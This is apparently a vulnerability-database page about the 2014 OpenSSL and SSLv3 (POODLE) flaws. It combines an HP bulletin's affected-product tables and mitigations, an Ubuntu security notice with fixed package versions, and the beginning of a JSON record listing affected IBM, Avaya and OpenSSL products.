w/VCX + 8BRI/4FXS Mod JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS JE340A HP VCX Connect 100 Pri Server 9.0 JE342A HP VCX Connect 100 Sec Server 9.0

CVE-2014-3566 CVE-2014-3568

iMC PLAT iMC PLAT v7.1 E0303P06 JD125A HP IMC Std S/W Platform w/100-node JD126A HP IMC Ent S/W Platform w/100-node JD808A HP IMC Ent Platform w/100-node License JD815A HP IMC Std Platform w/100-node License JF377A HP IMC Std S/W Platform w/100-node Lic JF377AAE HP IMC Std S/W Pltfrm w/100-node E-LTU JF378A HP IMC Ent S/W Platform w/200-node Lic JF378AAE HP IMC Ent S/W Pltfrm w/200-node E-LTU JG546AAE HP IMC Basic SW Platform w/50-node E-LTU JG548AAE HP PCM+ to IMC Bsc Upgr w/50-node E-LTU JG549AAE HP PCM+ to IMC Std Upgr w/200-node E-LTU JG550AAE HP PMM to IMC Bsc WLM Upgr w/150AP E-LTU JG590AAE HP IMC Bsc WLAN Mgr SW Pltfm 50 AP E-LTU JG659AAE HP IMC Smart Connect VAE E-LTU JG660AAE HP IMC Smart Connect w/WLM VAE E-LTU JG747AAE HP IMC Std SW Plat w/ 50 Nodes E-LTU JG748AAE HP IMC Ent SW Plat w/ 50 Nodes E-LTU JG766AAE HP IMC SmCnct Vrtl Applnc SW E-LTU JG767AAE HP IMC SmCnct WSM Vrtl Applnc SW E-LTU JG768AAE HP PCM+ to IMC Std Upg w/ 200-node E-LTU

CVE-2014-3566

iMC UAM iMC UAM v7.1 E0302P07 JD144A HP IMC UAM S/W Module w/200-User License JF388A HP IMC UAM S/W Module w/200-user License JF388AAE HP IMC UAM S/W Module w/200-user E-LTU JG752AAE HP IMC UAM SW Mod w/ 50-user E-LTU

CVE-2014-3513 CVE-2014-3566 CVE-2014-3567

iMC WSM Fix in Progress Use Mitigation JD456A HP WSM Plug-in for IMC Includes 50 Aps JF414A HP IMC WSM S/W Module with 50-AP License JF414AAE HP IMC WSM S/W Module with 50-AP E-LTU JG551AAE HP PMM to IMC WSM Upgr w/250 AP E-LTU JG769AAE HP PMM to IMC WSM Upg w/ 250-node E-LTU

CVE-2014-3513 CVE-2014-3566 CVE-2014-3567

A Fixes in progress use mitigations J9565A HP 2615-8-PoE Switch J9562A HP 2915-8G-PoE Switch

E Fixes in progress use mitigations J4850A HP ProCurve Switch 5304xl J8166A HP ProCurve Switch 5304xl-32G J4819A HP ProCurve Switch 5308xl J8167A HP ProCurve Switch 5308xl-48G J4849A HP ProCurve Switch 5348xl J4849B HP ProCurve Switch 5348xl J4848A HP ProCurve Switch 5372xl J4848B HP ProCurve Switch 5372xl

F Fixes in progress use mitigations J4812A HP ProCurve 2512 Switch J4813A HP ProCurve 2524 Switch J4817A HP ProCurve 2312 Switch J4818A HP ProCurve 2324 Switch

H.07 Fixes in progress use mitigations J4902A HP ProCurve 6108 Switch

H.10 Fixes in progress use mitigations J8762A HP E2600-8-PoE Switch J4900A HP PROCURVE SWITCH 2626 J4900B HP ProCurve Switch 2626 J4900C ProCurve Switch 2626 J4899A HP ProCurve Switch 2650 J4899B HP ProCurve Switch 2650 J4899C ProCurve Switch 2650 J8164A ProCurve Switch 2626-PWR J8165A HP ProCurve Switch 2650-PWR

i.10 Fixes in progress use mitigations J4903A ProCurve Switch 2824 J4904A HP ProCurve Switch 2848

J Fixes in progress use mitigations J9299A HP 2520-24G-PoE Switch J9298A HP 2520-8G-PoE Switch

K Fixes in progress use mitigations J8692A HP 3500-24G-PoE yl Switch J8693A HP 3500-48G-PoE yl Switch J9310A HP 3500-24G-PoE+ yl Switch J9311A HP 3500-48G-PoE+ yl Switch J9470A HP 3500-24 Switch J9471A HP 3500-24-PoE Switch J9472A HP 3500-48 Switch J9473A HP 3500-48-PoE Switch J8697A HP E5406 zl Switch Chassis J8699A HP 5406-48G zl Switch J9447A HP 5406-44G-PoE+-4SFP zl Switch J9533A HP 5406-44G-PoE+-2XG v2 zl Swch w Pm SW J9539A HP 5406-44G-PoE+-4G v2 zl Swch w Prm SW J9642A HP 5406 zl Switch with Premium Software J9866A HP 5406 8p10GT 8p10GE Swch and Psw J8698A HP E5412 zl Switch Chassis J8700A HP 5412-96G zl Switch J9448A HP 5412-92G-PoE+-4SFP zl Switch J9532A HP 5412-92G-PoE+-2XG v2 zl Swch w Pm SW J9540A HP 5412-92G-PoE+-4G v2 zl Swch w Prm SW J9643A HP 5412 zl Switch with Premium Software J8992A HP 6200-24G-mGBIC yl Switch J9263A HP E6600-24G Switch J9264A HP 6600-24G-4XG Switch J9265A HP 6600-24XG Switch J9451A HP E6600-48G Switch J9452A HP 6600-48G-4XG Switch J9475A HP E8206 zl Switch Base System J9638A HP 8206-44G-PoE+-2XG v2 zl Swch w Pm SW J9640A HP 8206 zl Switch w/Premium Software J8715A ProCurve Switch 8212zl Base System J8715B HP E8212 zl Switch Base System J9091A ProCurve Switch 8212zl Chassis&Fan Tray J9639A HP 8212-92G-PoE+-2XG v2 zl Swch w Pm SW J9641A HP 8212 zl Switch with Premium SW

KA Fixes in progress use mitigations J9573A HP 3800-24G-PoE+-2SFP+ Switch J9574A HP 3800-48G-PoE+-4SFP+ Switch J9575A HP 3800-24G-2SFP+ Switch J9576A HP 3800-48G-4SFP+ Switch J9584A HP 3800-24SFP-2SFP+ Switch J9585A HP 3800-24G-2XG Switch J9586A HP 3800-48G-4XG Switch J9587A HP 3800-24G-PoE+-2XG Switch J9588A HP 3800-48G-PoE+-4XG Switch

KB Fixes in progress use mitigations J9821A HP 5406R zl2 Switch J9822A HP 5412R zl2 Switch J9823A HP 5406R-Gig-T-PoE+/SFP+ v2 zl2 Swch J9824A HP 5406R-Gig-T-PoE+/SFP v2 zl2 Swch J9825A HP 5412R-Gig-T-PoE+/SFP+ v2 zl2 Swch J9826A HP 5412R-Gig-T-PoE+/SFP v2 zl2 Swch J9850A HP 5406R zl2 Switch J9851A HP 5412R zl2 Switch J9868A HP 5406R-8XGT/8SFP+ v2 zl2 Swch

L Fixes in progress use mitigations J8772B HP 4202-72 Vl Switch J8770A HP 4204 Vl Switch Chassis J9064A HP 4204-44G-4SFP Vl Switch J8773A HP 4208 Vl Switch Chassis J9030A HP 4208-68G-4SFP Vl Switch J8775B HP 4208-96 Vl Switch J8771A ProCurve Switch 4202VL-48G J8772A ProCurve Switch 4202VL-72 J8774A ProCurve Switch 4208VL-64G J8775A ProCurve Switch 4208VL-96

M.08 Fixes in progress use mitigations J8433A HP 6400-6XG cl Switch J8474A HP 6410-6XG cl Switch

M.10 Fixes in progress use mitigations J4906A HP E3400-48G cl Switch J4905A HP ProCurve Switch 3400cl-24G

N Fixes in progress use mitigations J9021A HP 2810-24G Switch J9022A HP 2810-48G Switch

PA Fixes in progress use mitigations J9029A ProCurve Switch 1800-8G

PB Fixes in progress use mitigations J9028A ProCurve Switch 1800-24G J9028B ProCurve Switch 1800-24G

Q Fixes in progress use mitigations J9019B HP 2510-24 Switch J9019A ProCurve Switch 2510-24

R Fixes in progress use mitigations J9085A HP 2610-24 Switch J9087A HP 2610-24-PoE Switch J9086A HP 2610-24-PPoE Switch J9088A HP 2610-48 Switch J9089A HP 2610-48-PoE Switch

RA Fixes in progress use mitigations J9623A HP 2620-24 Switch J9624A HP 2620-24-PPoE+ Switch J9625A HP 2620-24-PoE+ Switch J9626A HP 2620-48 Switch J9627A HP 2620-48-PoE+ Switch

S Fixes in progress use mitigations J9138A HP 2520-24-PoE Switch J9137A HP 2520-8-PoE Switch

T Fixes in progress use mitigations J9049A ProCurve Switch 2900- 24G J9050A ProCurve Switch 2900 48G

U Fixes in progress use mitigations J9020A HP 2510-48 Switch

VA Fixes in progress use mitigations J9079A HP 1700-8 Switch

VB Fixes in progress use mitigations J9080A HP 1700-24 Switch

W Fixes in progress use mitigations J9145A HP 2910-24G al Switch J9146A HP 2910-24G-PoE+ al Switch J9147A HP 2910-48G al Switch J9148A HP 2910-48G-PoE+ al Switch

WB Fixes in progress use mitigations J9726A HP 2920-24G Switch J9727A HP 2920-24G-POE+ Switch J9728A HP 2920-48G Switch J9729A HP 2920-48G-POE+ Switch J9836A HP 2920-48G-POE+ 740W Switch

Y Fixes in progress use mitigations J9279A HP 2510-24G Switch J9280A HP 2510-48G Switch

YA Fixes in progress use mitigations J9772A HP 2530-48G-PoE+ Switch J9773A HP 2530-24G-PoE+ Switch J9774A HP 2530-8G-PoE+ Switch J9775A HP 2530-48G Switch J9776A HP 2530-24G Switch J9777A HP 2530-8G Switch J9778A HP 2530-48-PoE+ Switch J9781A HP 2530-48 Switch J9853A HP 2530-48G-PoE+-2SFP+ Switch J9854A HP 2530-24G-PoE+-2SFP+ Switch J9855A HP 2530-48G-2SFP+ Switch J9856A HP 2530-24G-2SFP+ Switch

YB Fixes in progress use mitigations J9779A HP 2530-24-PoE+ Switch J9780A HP 2530-8-PoE+ Switch J9782A HP 2530-24 Switch J9783A HP 2530-8 Switch

MSM 6.5 6.5.1.0 J9420A HP MSM760 Premium Mobility Controller J9421A HP MSM760 Access Controller J9370A HP MSM765 Zl Premium Mobility Controller J9693A HP MSM720 Access Controller (WW) J9694A HP MSM720 Premium Mobility Cntlr (WW) J9695A HP MSM720 TAA Access Controller J9696A HP MSM720 TAA Premium Mobility Cntlr J9840A HP MSM775 zl Premium Controller Module J9845A HP 560 Wireless 802.11ac (AM) AP J9846A HP 560 Wireless 802.11ac (WW) AP J9847A HP 560 Wireless 802.11ac (JP) AP J9848A HP 560 Wireless 802.11ac (IL) AP J9358A HP E-MSM422 Access Point (US) J9358B HP MSM422 Access Point (US) J9359A HP E-MSM422 Access Point (WW) J9359B HP MSM422 Access Point (WW) J9530A HP E-MSM422 Access Point (JP) J9530B HP MSM422 Access Point (JP) J9617A HP MSM422 Dual Radio 802.11n AP (IL) J9426A HP E-MSM410 Access Point (US) J9426B HP MSM410 Access Point (US) J9427A HP E-MSM410 Access Point (WW) J9427B HP MSM410 Access Point (WW) J9427C HP MSM410 Access Point (WW) J9529A HP E-MSM410 Access Point (JP) J9529B HP MSM410 Access Point (JP) J9589A HP MSM460 Dual Radio 802.11n AP (JP) J9590A HP MSM460 Dual Radio 802.11n AP (AM) J9591A HP MSM460 Dual Radio 802.11n AP (WW) J9616A HP MSM410 Single Radio 802.11n AP (IL) J9618A HP MSM460 Dual Radio 802.11n AP (IL) J9619A HP MSM466 Dual Radio 802.11n AP (IL) J9620A HP MSM466 Dual Radio 802.11n AP (JP) J9621A HP MSM466 Dual Radio 802.11n AP (AM) J9622A HP MSM466 Dual Radio 802.11n AP (WW) J9650A HP MSM430 Dual Radio 802.11n AP (AM) J9651A HP MSM430 Dual Radio 802.11n AP (WW) J9652A HP MSM430 Dual Radio 802.11n AP (JP) J9653A HP MSM430 Dual Radio 802.11n AP (IL) J9654A HP MSM430 Dual Radio 802.11n TAA AP J9655A HP MSM460 Dual Radio 802.11n TAA AP J9656A HP MSM466 Dual Radio 802.11n TAA AP J9715A HP E-MSM466-R Dual Radio 802.11n AP (AM) J9716A HP E-MSM466-R Dual Radio 802.11n AP (WW) J9717A HP E-MSM466-R Dual Radio 802.11n AP (JP) J9718A HP E-MSM466-R Dual Radio 802.11n AP (IL)

MSM 6.4 6.4.2.1 J9840A HP MSM775 zl Premium Controller Module J9370A HP MSM765 Zl Premium Mobility Controller J9420A HP MSM760 Premium Mobility Controller J9421A HP MSM760 Access Controller J9693A HP MSM720 Access Controller (WW) J9694A HP MSM720 Premium Mobility Cntlr (WW) J9695A HP MSM720 TAA Access Controller J9696A HP MSM720 TAA Premium Mobility Cntlr J9426A HP E-MSM410 Access Point (US) J9426B HP MSM410 Access Point (US) J9427A HP E-MSM410 Access Point (WW) J9427B HP MSM410 Access Point (WW) J9427C HP MSM410 Access Point (WW) J9529A HP E-MSM410 Access Point (JP) J9529B HP MSM410 Access Point (JP) J9589A HP MSM460 Dual Radio 802.11n AP (JP) J9590A HP MSM460 Dual Radio 802.11n AP (AM) J9591A HP MSM460 Dual Radio 802.11n AP (WW) J9616A HP MSM410 Single Radio 802.11n AP (IL) J9618A HP MSM460 Dual Radio 802.11n AP (IL) J9619A HP MSM466 Dual Radio 802.11n AP (IL) J9620A HP MSM466 Dual Radio 802.11n AP (JP) J9621A HP MSM466 Dual Radio 802.11n AP (AM) J9622A HP MSM466 Dual Radio 802.11n AP (WW) J9650A HP MSM430 Dual Radio 802.11n AP (AM) J9651A HP MSM430 Dual Radio 802.11n AP (WW) J9652A HP MSM430 Dual Radio 802.11n AP (JP) J9653A HP MSM430 Dual Radio 802.11n AP (IL) J9654A HP MSM430 Dual Radio 802.11n TAA AP J9655A HP MSM460 Dual Radio 802.11n TAA AP J9656A HP MSM466 Dual Radio 802.11n TAA AP J9715A HP E-MSM466-R Dual Radio 802.11n AP (AM) J9716A HP E-MSM466-R Dual Radio 802.11n AP (WW) J9717A HP E-MSM466-R Dual Radio 802.11n AP (JP) J9718A HP E-MSM466-R Dual Radio 802.11n AP (IL) J9358A HP E-MSM422 Access Point (US) J9358B HP MSM422 Access Point (US) J9359A HP E-MSM422 Access Point (WW) J9359B HP MSM422 Access Point (WW) J9530A HP E-MSM422 Access Point (JP) J9530B HP MSM422 Access Point (JP) J9617A HP MSM422 Dual Radio 802.11n AP (IL)

MSM 6.3 6.3.1.0 J9529B HP MSM410 Access Point (JP) J9589A HP MSM460 Dual Radio 802.11n AP (JP) J9590A HP MSM460 Dual Radio 802.11n AP (AM) J9591A HP MSM460 Dual Radio 802.11n AP (WW) J9616A HP MSM410 Single Radio 802.11n AP (IL) J9618A HP MSM460 Dual Radio 802.11n AP (IL) J9619A HP MSM466 Dual Radio 802.11n AP (IL) J9620A HP MSM466 Dual Radio 802.11n AP (JP) J9621A HP MSM466 Dual Radio 802.11n AP (AM) J9622A HP MSM466 Dual Radio 802.11n AP (WW) J9650A HP MSM430 Dual Radio 802.11n AP (AM) J9651A HP MSM430 Dual Radio 802.11n AP (WW) J9652A HP MSM430 Dual Radio 802.11n AP (JP) J9653A HP MSM430 Dual Radio 802.11n AP (IL) J9654A HP MSM430 Dual Radio 802.11n TAA AP J9655A HP MSM460 Dual Radio 802.11n TAA AP J9656A HP MSM466 Dual Radio 802.11n TAA AP J9715A HP E-MSM466-R Dual Radio 802.11n AP (AM) J9716A HP E-MSM466-R Dual Radio 802.11n AP (WW) J9717A HP E-MSM466-R Dual Radio 802.11n AP (JP) J9718A HP E-MSM466-R Dual Radio 802.11n AP (IL) J9356A HP E-MSM335 Access Point (US) J9356B HP MSM335 Access Point (US) J9357A HP E-MSM335 Access Point (WW) J9357B HP MSM335 Access Point (WW) J9358A HP E-MSM422 Access Point (US) J9358B HP MSM422 Access Point (US) J9359A HP E-MSM422 Access Point (WW) J9359B HP MSM422 Access Point (WW) J9530A HP E-MSM422 Access Point (JP) J9530B HP MSM422 Access Point (JP) J9617A HP MSM422 Dual Radio 802.11n AP (IL) J9360A HP E-MSM320 Access Point (US) J9360B HP MSM320 Access Point (US) J9364A HP E-MSM320 Access Point (WW) J9364B HP MSM320 Access Point (WW) J9365A HP MSM320-R Access Point (US) J9365B HP MSM320-R Access Point (US) J9368A HP E-MSM320-R Access Point (WW) J9368B HP MSM320-R Access Point (WW) J9373A HP E-MSM325 Access Point (WW) J9373B HP MSM325 Access Point (WW) J9374A HP E-MSM310 Access Point (US) J9374B HP MSM310 Access Point (US) J9379A HP MSM310 Access Point (WW) J9379B HP MSM310 Access Point (WW) J9380A HP E-MSM310-R Access Point (US) J9380B HP MSM310-R Access Point (US) J9383A HP E-MSM310-R Access Point (WW) J9383B HP MSM310-R Access Point (WW) J9524A HP E-MSM310 Access Point (JP) J9524B HP MSM310 Access Point (JP) J9527A HP E-MSM320 Access Point (JP) J9527B HP MSM320 Access Point (JP) J9528A HP E-MSM320-R Access Point (JP) J9528B HP MSM320-R Access Point (JP)

MSM 6.2 6.2.1.2 J9370A HP MSM765 Zl Premium Mobility Controller J9356A HP E-MSM335 Access Point (US) J9356B HP MSM335 Access Point (US) J9357A HP E-MSM335 Access Point (WW) J9357B HP MSM335 Access Point (WW) J9358A HP E-MSM422 Access Point (US) J9358B HP MSM422 Access Point (US) J9359A HP E-MSM422 Access Point (WW) J9359B HP MSM422 Access Point (WW) J9530A HP E-MSM422 Access Point (JP) J9530B HP MSM422 Access Point (JP) J9617A HP MSM422 Dual Radio 802.11n AP (IL) J9420A HP MSM760 Premium Mobility Controller J9421A HP MSM760 Access Controller J9840A HP MSM775 zl Premium Controller Module J9360A HP E-MSM320 Access Point (US) J9360B HP MSM320 Access Point (US) J9364A HP E-MSM320 Access Point (WW) J9364B HP MSM320 Access Point (WW) J9365A HP MSM320-R Access Point (US) J9365B HP MSM320-R Access Point (US) J9368A HP E-MSM320-R Access Point (WW) J9368B HP MSM320-R Access Point (WW) J9373A HP E-MSM325 Access Point (WW) J9373B HP MSM325 Access Point (WW) J9374A HP E-MSM310 Access Point (US) J9374B HP MSM310 Access Point (US) J9379A HP MSM310 Access Point (WW) J9379B HP MSM310 Access Point (WW) J9380A HP E-MSM310-R Access Point (US) J9380B HP MSM310-R Access Point (US) J9383A HP E-MSM310-R Access Point (WW) J9383B HP MSM310-R Access Point (WW) J9524A HP E-MSM310 Access Point (JP) J9524B HP MSM310 Access Point (JP) J9527A HP E-MSM320 Access Point (JP) J9527B HP MSM320 Access Point (JP) J9528A HP E-MSM320-R Access Point (JP) J9528B HP MSM320-R Access Point (JP) J9426A HP E-MSM410 Access Point (US) J9426B HP MSM410 Access Point (US) J9427A HP E-MSM410 Access Point (WW) J9427B HP MSM410 Access Point (WW) J9427C HP MSM410 Access Point (WW) J9529A HP E-MSM410 Access Point (JP) J9529B HP MSM410 Access Point (JP) J9589A HP MSM460 Dual Radio 802.11n AP (JP) J9590A HP MSM460 Dual Radio 802.11n AP (AM) J9591A HP MSM460 Dual Radio 802.11n AP (WW) J9616A HP MSM410 Single Radio 802.11n AP (IL) J9618A HP MSM460 Dual Radio 802.11n AP (IL) J9619A HP MSM466 Dual Radio 802.11n AP (IL) J9620A HP MSM466 Dual Radio 802.11n AP (JP) J9621A HP MSM466 Dual Radio 802.11n AP (AM) J9622A HP MSM466 Dual Radio 802.11n AP (WW) J9650A HP MSM430 Dual Radio 802.11n AP (AM) J9651A HP MSM430 Dual Radio 802.11n AP (WW) J9652A HP MSM430 Dual Radio 802.11n AP (JP) J9653A HP MSM430 Dual Radio 802.11n AP (IL) J9654A HP MSM430 Dual Radio 802.11n TAA AP J9655A HP MSM460 Dual Radio 802.11n TAA AP J9656A HP MSM466 Dual Radio 802.11n TAA AP J9715A HP E-MSM466-R Dual Radio 802.11n AP (AM) J9716A HP E-MSM466-R Dual Radio 802.11n AP (WW) J9717A HP E-MSM466-R Dual Radio 802.11n AP (JP) J9718A HP E-MSM466-R Dual Radio 802.11n AP (IL) J9693A HP MSM720 Access Controller (WW) J9694A HP MSM720 Premium Mobility Cntlr (WW) J9695A HP MSM720 TAA Access Controller J9696A HP MSM720 TAA Premium Mobility Cntlr

M220 Fixes in progress use mitigations J9798A HP M220 802.11n (AM) Access Point J9799A HP M220 802.11n (WW) Access Point

M210 Fixes in progress use mitigations JL023A HP M210 802.11n (AM) Access Point JL024A HP M210 802.11n (WW) Access Point

PS110 Fixes in progress use mitigations JL065A HP PS110 Wireless 802.11n VPN AM Router JL066A HP PS110 Wireless 802.11n VPN WW Router

HP Office Connect 1810 PK Fixes in progress use mitigations J9660A HP 1810-48G Switch

HP Office Connect 1810 P Fixes in progress use mitigations J9450A HP 1810-24G Switch J9449A HP 1810-8G Switch

HP Office Connect 1810 PL Fixes in progress use mitigations J9802A HP 1810-8G v2 Switch J9803A HP 1810-24G v2 Switch

RF Manager Fixes in progress use mitigations J9522A HP E-MSM415 RF Security Sensor J9521A HP RF Manager Controller with 50 Sensor License J9838AAE HP RF Manager for VMware 50 Sensor E-LTU

HP Office Connect 1810 PM Fixes in progress use mitigations J9800A HP 1810-8 v2 Switch J9801A HP 1810-24 v2 Switch

HP Office Connect PS1810 Fixes in progress use mitigations J9833A HP PS1810-8G Switch J9834A HP PS1810-24G Switch

Mitigation Instructions

For SSLv3 Server Functionality on Impacted Products:

Disable SSLv3 on clients and/or disable CBC ciphers on clients Use Access Control functionality to control client access

For SSLv3 Client Functionality on Impacted Products:

Go to SSL server and disable SSLv3 and/or disable CBC ciphers Use Access Control functionality to control access to servers

HISTORY Version:1 (rev.1) - 2 April 2015 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. The HP Matrix Operating Environment v7.2.3 Update kit applicable to HP Matrix Operating Environment 7.2.x installations is available at the following location:

https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber =HPID

NOTE: Please read the readme.txt file before proceeding with the installation. HP BladeSystem c-Class Onboard Administrator (OA) 4.30 and earlier.

Go to http://www.hp.com/go/oa

Select "Onboard Administrator Firmware" Select product name as ""HP BLc3000 Onboard Administrator Option" or "HP BLc7000 Onboard Administrator Option" Select the operating system from the list of choices Select Firmware version 4.40 for download Refer to the HP BladeSystem Onboard Administrator User Guide for steps to update the Onboard Administrator firmware. ============================================================================ Ubuntu Security Notice USN-2385-1 October 16, 2014

openssl vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

Ubuntu 14.04 LTS
Ubuntu 12.04 LTS
Ubuntu 10.04 LTS

Summary:

Several security issues were fixed in OpenSSL. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS.

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.7

Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.20

Ubuntu 10.04 LTS: libssl0.9.8 0.9.8k-7ubuntu8.22

After a standard system update you need to reboot your computer to make all the necessary changes

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201410-1144",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "flex system chassis management module",
        "scope": null,
        "trust": 3.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "flex system chassis management module",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "ibm",
        "version": "1.50.1"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "openssl",
        "version": "1.0.1f"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "openssl",
        "version": "1.0.1i"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "openssl",
        "version": "1.0.1a"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "openssl",
        "version": "1.0.1h"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "openssl",
        "version": "1.0.1d"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "openssl",
        "version": "1.0.1b"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "openssl",
        "version": "1.0.1g"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "openssl",
        "version": "1.0.1c"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "openssl",
        "version": "1.0.1e"
      },
      {
        "model": "flex system chassis management module 1.1.1",
        "scope": null,
        "trust": 1.2,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0d"
      },
      {
        "model": "openssl",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "0.9.8zb"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0m"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0n"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0h"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0a"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0j"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0g"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0b"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0f"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0e"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0i"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0c"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0l"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0k"
      },
      {
        "model": "bladecenter advanced management module 3.66n",
        "scope": "ne",
        "trust": 0.9,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "bladecenter advanced management module 3.66k",
        "scope": null,
        "trust": 0.9,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "flex system chassis management module 1.50.0",
        "scope": null,
        "trust": 0.6,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "global console manager",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "ibm",
        "version": "1.26.1.23978"
      },
      {
        "model": "global console manager",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "ibm",
        "version": "1.4.2.15036"
      },
      {
        "model": "global console manager",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "ibm",
        "version": "1.20.20.23447"
      },
      {
        "model": "flex system chassis management module",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "ibm",
        "version": "1.50.0"
      },
      {
        "model": "project openssl 1.0.0a",
        "scope": null,
        "trust": 0.6,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "local console manager",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "ibm",
        "version": "1.2.39.0"
      },
      {
        "model": "local console manager",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "ibm",
        "version": "1.2.27.00"
      },
      {
        "model": "local console manager",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "ibm",
        "version": "1.2.40.00"
      },
      {
        "model": "flex system chassis management module 1.40.1",
        "scope": null,
        "trust": 0.6,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "cognos controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5.1"
      },
      {
        "model": "security network intrusion prevention system gx7412-05",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "aura collaboration environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.0"
      },
      {
        "model": "nextscale n1200 enclosure fan power controller fhet23g-2.06",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx5108-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "upward integration modules for vmware vsphere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.5"
      },
      {
